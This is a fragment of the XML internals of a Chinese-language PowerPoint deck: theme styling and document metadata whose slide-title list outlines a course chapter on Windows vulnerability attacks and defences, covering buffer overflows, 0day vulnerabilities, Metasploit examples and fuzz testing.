                <a:shade val="100000"/>
                <a:hueMod val="130000"/>
                <a:satMod val="150000"/>
                <a:lumMod val="112000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="92000"/>
                <a:satMod val="140000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" xmlns="" name="Droplet" id="{8984A317-299A-4E50-B45D-BFC9EDE2337A}" vid="{A633B6A3-9E7F-4C10-9C98-2517A3134361}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Droplet</Template>
  <TotalTime>2057</TotalTime>
  <Words>4788</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>252</Paragraphs>
  <Slides>55</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>55</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="56" baseType="lpstr">
      <vt:lpstr>Droplet</vt:lpstr>
      <vt:lpstr>第8章  Windows系统漏洞攻击与防范 </vt:lpstr>
      <vt:lpstr>幻灯片 2</vt:lpstr>
      <vt:lpstr>案例一：Windows 8新安全问题，隐私易遭泄漏 </vt:lpstr>
      <vt:lpstr>案例二：黑客加速0Day攻击速度，重金买广告位挂马 </vt:lpstr>
      <vt:lpstr>思考 </vt:lpstr>
      <vt:lpstr>8.1 缓冲区溢出攻击 </vt:lpstr>
      <vt:lpstr>8.1 缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>8.1 缓冲区溢出攻击 </vt:lpstr>
      <vt:lpstr>8.1.1 缓冲区溢出的基本原理 </vt:lpstr>
      <vt:lpstr>8.1.1 缓冲区溢出的基本原理</vt:lpstr>
      <vt:lpstr>8.1.1 缓冲区溢出的基本原理</vt:lpstr>
      <vt:lpstr>8.1.2 缓冲区溢出漏洞的类型 </vt:lpstr>
      <vt:lpstr>8.1.2 缓冲区溢出漏洞的类型</vt:lpstr>
      <vt:lpstr>8.1.2 缓冲区溢出漏洞的类型</vt:lpstr>
      <vt:lpstr>8.1.3 缓冲区溢出漏洞的危害 </vt:lpstr>
      <vt:lpstr>8.1.3 缓冲区溢出漏洞的危害 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.1.4 缓冲区溢出实例 </vt:lpstr>
      <vt:lpstr>8.2 0day漏洞应用 </vt:lpstr>
      <vt:lpstr>8.2.1 什么是0day漏洞 </vt:lpstr>
      <vt:lpstr>8.2.2 0day漏洞分析 </vt:lpstr>
      <vt:lpstr>8.2.2 0day漏洞分析 </vt:lpstr>
      <vt:lpstr>8.2.2 0day漏洞分析 </vt:lpstr>
      <vt:lpstr>8.2.2 0day漏洞分析 </vt:lpstr>
      <vt:lpstr>8.2.3 0day漏洞利用 </vt:lpstr>
      <vt:lpstr>8.2.3 0day漏洞利用 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.2.4 Metasploit测试实例 </vt:lpstr>
      <vt:lpstr>8.3  软件安全性分析 </vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.1 Fuzz测试</vt:lpstr>
      <vt:lpstr>8.3.2 软件产品安全性综合测试</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第8章  Windows系统漏洞攻击与防范 </dc:title>
  <cp:lastModifiedBy>Lenovo</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-13T06:59:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-28T15:04:11Z</dcterms:modified>
</cp:coreProperties>
</file>